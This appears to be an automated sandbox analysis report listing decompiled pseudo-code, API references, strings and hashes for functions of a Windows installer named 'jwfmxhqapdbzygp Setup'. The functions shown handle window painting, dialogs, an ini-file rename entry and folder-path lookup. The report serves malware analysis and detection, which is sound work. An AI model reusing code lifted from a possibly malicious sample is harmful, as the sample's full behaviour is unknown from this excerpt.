						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42ec28, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42ec28, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42a080 != 0) {
						goto L25;
					} else {
						_t112 =  *0x429870 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403EA5(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404256();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42e3fc; // 0x6c6eb3
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_t71 =  *0x42ec58; // 0x6c56f4
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 + _t71;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403F97;
				E00403E83(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403E83(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403EA5( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403EB8(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t85 =  *0x42ec30; // 0x6c0230
				_t86 =  *(_t85 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x429064 =  *0x429064 & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x42a080 =  *0x42a080 & 0x00000000;
				return 0;
			}

0x00403fdb
0x00404101
0x0040415d
0x00404161
0x00404238
0x0040423a
0x0040423a
0x00404240
0x00404240
0x00404243
0x00000000
0x0040424a
0x0040416f
0x00404171
0x0040417b
0x00404186
0x00404189
0x0040418c
0x00404197
0x0040419a
0x004041a1
0x004041af
0x004041c7
0x004041da
0x004041ea
0x004041ec
0x004041ec
0x004041a1
0x004041f6
0x00000000
0x00404201
0x00404205
0x00404216
0x00404216
0x0040421c
0x0040422a
0x0040422a
0x00000000
0x0040422e
0x004041f6
0x0040410c
0x00000000
0x00404120
0x00404126
0x0040412c
0x00000000
0x00000000
0x00404151
0x00404153
0x00404158
0x00000000
0x00404158
0x0040410c
0x00403fe1
0x00403fe4
0x00403fe9
0x00403feb
0x00403ffa
0x00403ffa
0x00403ffc
0x00404001
0x00404004
0x00404006
0x0040400b
0x00404014
0x0040401a
0x00404026
0x00404029
0x00404032
0x00404037
0x0040403a
0x0040403f
0x00404056
0x0040405d
0x00404070
0x00404073
0x00404088
0x0040408a
0x0040408f
0x00404094
0x00404099
0x00404099
0x004040a8
0x004040b7
0x004040b9
0x004040cf
0x004040de
0x004040e0
0x00000000

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404056
GetDlgItem.USER32 ref: 0040406A
SendMessageA.USER32 ref: 00404088
GetSysColor.USER32(?), ref: 00404099
SendMessageA.USER32 ref: 004040A8
SendMessageA.USER32 ref: 004040B7
lstrlenA.KERNEL32(?), ref: 004040C1
SendMessageA.USER32 ref: 004040CF
SendMessageA.USER32 ref: 004040DE
GetDlgItem.USER32 ref: 00404141
SendMessageA.USER32 ref: 00404144
GetDlgItem.USER32 ref: 0040416F
SendMessageA.USER32 ref: 004041AF
LoadCursorA.USER32 ref: 004041BE
SetCursor.USER32(00000000), ref: 004041C7
ShellExecuteA.SHELL32(0000070B,open,0042DBC0,00000000,00000000,00000001), ref: 004041DA
LoadCursorA.USER32 ref: 004041E7
SetCursor.USER32(00000000), ref: 004041EA
SendMessageA.USER32 ref: 00404216
SendMessageA.USER32 ref: 0040422A

Strings

open, xrefs: 004041D2
N, xrefs: 0040415D
TclpOwkq, xrefs: 0040419A

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: N$TclpOwkq$open
API String ID: 3615053054-1106227724
Opcode ID: c58a0b319f6ceee57a7eba4f5dbe9c3c6e8762fb962b098a8fd1953549ce9262
Instruction ID: 220b67e7875a360065d3b56f20ed6dbf7aa7168a1850c9919f5fb7903a7ea725
Opcode Fuzzy Hash: c58a0b319f6ceee57a7eba4f5dbe9c3c6e8762fb962b098a8fd1953549ce9262
Instruction Fuzzy Hash: C861F271A40309BFEB109F61CC45F6A3B69FB44715F10403AFB04BA2D1C7B8AA51CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42ec30; // 0x6c0230
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "jwfmxhqapdbzygp Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x42ec28; // 0xf0380
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x00401019
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,?), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,jwfmxhqapdbzygp Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C
jwfmxhqapdbzygp Setup, xrefs: 00401150

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F$jwfmxhqapdbzygp Setup
API String ID: 941294808-1909665709
Opcode ID: 05bbfc508ef237e24a9817a54f4a45d084594548d285a69524b208d70469c4e1
Instruction ID: 9dd9d9e9de989eb397972ae7cf78bef649c8fbd879b4abede4b5176bd3adbacf
Opcode Fuzzy Hash: 05bbfc508ef237e24a9817a54f4a45d084594548d285a69524b208d70469c4e1
Instruction Fuzzy Hash: 08419D71804249AFCB058F95DD459BFBFB9FF44314F00802AF951AA1A0C738E951DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00405915, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00405915(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				intOrPtr _t18;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405F57(2);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x42ecb0 =  *0x42ecb0 + 1;
						return _t20;
					}
				}
				 *0x42c230 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x42bca8, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x42b8a8, "%s=%s\r\n", 0x42c230, 0x42bca8);
						_t18 =  *0x42ec30; // 0x6c0230
						_t56 = _t55 + 0x10;
						E00405BE9(_t43, 0x400, 0x42bca8, 0x42bca8,  *((intOrPtr*)(_t18 + 0x128)));
						_t20 = E0040589E(0x42bca8, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E00405813(_t51, "[Rename]\r\n") != 0) {
								_t28 = E00405813(_t26 + 0xa, 0x4093e4);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E0040585F(_t51 + _t29, 0x42b8a8, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405BC7(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040589E(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x42c230, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}

0x0040591b
0x00405922
0x00405926
0x0040592f
0x00405933
0x00405a72
0x00405a72
0x00000000
0x00405a72
0x00405933
0x0040593f
0x00405955
0x0040597d
0x00405988
0x0040598c
0x004059ac
0x004059ae
0x004059b3
0x004059bd
0x004059ca
0x004059cf
0x004059d4
0x004059d8
0x00000000
0x00000000
0x004059e7
0x004059e9
0x004059f6
0x004059fa
0x00405a6b
0x00405a6c
0x00000000
0x00405a16
0x00405a23
0x00405a88
0x00405a8f
0x00405a36
0x00405a36
0x00405a38
0x00405a41
0x00405a4c
0x00405a5e
0x00405a65
0x00000000
0x00405a65
0x00405a91
0x00405a92
0x00405a97
0x00405a99
0x00405aa6
0x00405aa6
0x00405aaa
0x00000000
0x00000000
0x00000000
0x00000000
0x00405a9b
0x00405a9b
0x00405a9e
0x00405aa1
0x00405aa2
0x00000000
0x00405a9b
0x00405a2e
0x00405a33
0x00000000
0x00405a33
0x004059fa
0x00405957
0x00405962
0x0040596b
0x0040596f
0x00000000
0x00000000
0x0040596f
0x00405a7c

APIs

Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84

CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,004056AA,?,00000000,000000F1,?), ref: 00405962
GetShortPathNameA.KERNEL32 ref: 0040596B
GetShortPathNameA.KERNEL32 ref: 00405988
wsprintfA.USER32 ref: 004059A6
GetFileSize.KERNEL32(00000000,00000000,0042BCA8,C0000000,00000004,0042BCA8,?,?,?,00000000,000000F1,?), ref: 004059E1
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059F0
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 00405A06
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B8A8,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A4C
WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405A5E
GlobalFree.KERNEL32 ref: 00405A65
CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A6C

Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A

Strings

[Rename], xrefs: 00405A16, 00405A28
%s=%s, xrefs: 0040599C

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
String ID: %s=%s$[Rename]
API String ID: 3445103937-1727408572
Opcode ID: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
Instruction ID: 64f3c6dc45b3b00a74ff67058550f3a5a1124089509923db9c5fc79d761d9fea
Opcode Fuzzy Hash: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
Instruction Fuzzy Hash: 8941E131B05B166BD3206B619D89F6B3A5CDF45755F04063AFD05F22C1EA3CA8008EBE

Uniqueness

Uniqueness Score: -1.00%

Function 00405BE9, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197
stringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00405BE9(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				intOrPtr _t73;
				signed int _t74;
				signed int _t75;
				intOrPtr _t79;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t79 =  *0x42e3fc; // 0x6c6eb3
					_t36 =  *(_t79 - 4 + _t36 * 4);
				}
				_t73 =  *0x42ec58; // 0x6c56f4
				_t74 = _t73 + _t36;
				_t37 = 0x42dbc0;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x42dbc0;
				if(_a4 - 0x42dbc0 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405BE9(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x42dbc0;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x42f000;
							E00405BC7(_t86, (_t95 << 0xa) + 0x42f000);
						} else {
							E00405B25(_t86,  *0x42ec28);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405E29(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x42eca4;
						if( *0x42eca4 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x42ec24; // 0x74261340
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x42ec28,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x42ec28,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x42ec58;
							E00405AAE(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x42ec58, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405BE9(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405BC7(_a4, _t37);
			}

0x00405be9
0x00405be9
0x00405be9
0x00405bef
0x00405bf4
0x00405bf6
0x00405c05
0x00405c05
0x00405c07
0x00405c10
0x00405c12
0x00405c17
0x00405c1a
0x00405c1b
0x00405c22
0x00405c24
0x00405c2a
0x00405c2d
0x00405c2d
0x00405e06
0x00405e06
0x00405e0a
0x00000000
0x00000000
0x00405c3a
0x00405c40
0x00000000
0x00000000
0x00405c46
0x00405c47
0x00405c4a
0x00405c4d
0x00405df9
0x00405e03
0x00405e05
0x00405e05
0x00405dfb
0x00405dfd
0x00405dff
0x00405e00
0x00405e00
0x00000000
0x00405df9
0x00405c53
0x00405c57
0x00405c67
0x00405c6b
0x00405c72
0x00405c75
0x00405c79
0x00405c7f
0x00405c82
0x00405c85
0x00405c88
0x00405da3
0x00405da6
0x00405dd6
0x00405dd9
0x00405dde
0x00405de2
0x00405de2
0x00405de7
0x00405de8
0x00405ded
0x00405df0
0x00405df2
0x00000000
0x00405df2
0x00405da8
0x00405dab
0x00405dc0
0x00405dc7
0x00405dad
0x00405db4
0x00405db4
0x00405dcf
0x00405dd2
0x00405d9b
0x00405d9c
0x00405d9c
0x00000000
0x00405dd2
0x00405c90
0x00405c91
0x00405c97
0x00405c99
0x00405cb3
0x00405cb3
0x00405cba
0x00405cba
0x00405cc1
0x00405cc5
0x00405cc5
0x00405cc6
0x00405cc8
0x00405d01
0x00405d04
0x00405d14
0x00405d17
0x00405d1f
0x00405d25
0x00405d25
0x00405d81
0x00405d81
0x00405d83
0x00000000
0x00000000
0x00405d29
0x00405d30
0x00405d31
0x00405d33
0x00405d4d
0x00405d5b
0x00405d61
0x00405d63
0x00405d7e
0x00405d7e
0x00405d7e
0x00000000
0x00405d7e
0x00405d69
0x00405d74
0x00405d7a
0x00405d7c
0x00000000
0x00000000
0x00000000
0x00405d7c
0x00405d35
0x00405d38
0x00000000
0x00000000
0x00405d47
0x00405d49
0x00405d4b
0x00000000
0x00000000
0x00000000
0x00405d4b
0x00000000
0x00405d81
0x00405d0c
0x00000000
0x00405cca
0x00405ccf
0x00405ce5
0x00405cea
0x00405ced
0x00405d8a
0x00405d8a
0x00405d8e
0x00405d96
0x00405d96
0x00000000
0x00405d8e
0x00405cf7
0x00405d85
0x00405d85
0x00405d88
0x00000000
0x00000000
0x00000000
0x00405d88
0x00405cc8
0x00405c9b
0x00405c9f
0x00000000
0x00000000
0x00405ca1
0x00405ca5
0x00000000
0x00000000
0x00405ca7
0x00405cab
0x00000000
0x00405cad
0x00405cad
0x00000000
0x00405cad
0x00405cab
0x00405e10
0x00405e1a
0x00405e26
0x00405e26
0x00000000

APIs

GetVersion.KERNEL32(00000000,00429878,00000000,00404EEB,00429878,00000000), ref: 00405C91
GetSystemDirectoryA.KERNEL32 ref: 00405D0C
GetWindowsDirectoryA.KERNEL32(TclpOwkq,00000400), ref: 00405D1F
SHGetSpecialFolderLocation.SHELL32(?,00419301), ref: 00405D5B
SHGetPathFromIDListA.SHELL32(00419301,TclpOwkq), ref: 00405D69
CoTaskMemFree.OLE32(00419301), ref: 00405D74
lstrcatA.KERNEL32(TclpOwkq,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D96
lstrlenA.KERNEL32(TclpOwkq,00000000,00429878,00000000,00404EEB,00429878,00000000), ref: 00405DE8

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405D90
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405CDB
TclpOwkq, xrefs: 00405C12, 00405CD9, 00405CF6, 00405D0B, 00405D1E, 00405D3A, 00405D65, 00405D95, 00405D9B, 00405DB3, 00405DC6, 00405DE1, 00405DE7, 00405DF2, 00405E1C

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$TclpOwkq$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-487370903
Opcode ID: dad9380ef75d4ee6d1e7f44bcb98c3f3aee458906992b83e7d16e4410c3c70ab
Instruction ID: 131396e9090e0f007f21196dc47e10b2e1a614011cd8a075e276219472c4ac8b
Opcode Fuzzy Hash: dad9380ef75d4ee6d1e7f44bcb98c3f3aee458906992b83e7d16e4410c3c70ab
Instruction Fuzzy Hash: EA510531A04A04ABEB215B65DC88BBF3BA4DF05714F10823BE911B62D1D73C59429E5E

Uniqueness

Uniqueness Score: -1.00%

Function 00405E29, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E29(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405727(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004056E5("*?|<>/\":", _t5))) == 0) {
							E0040585F(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x00405e2b
0x00405e33
0x00405e47
0x00405e47
0x00405e4d
0x00405e5a
0x00405e5a
0x00405e5b
0x00405e5d
0x00405e61
0x00405e63
0x00405e6c
0x00405e6e
0x00405e88
0x00405e90
0x00405e90
0x00405e95
0x00405e97
0x00405e99
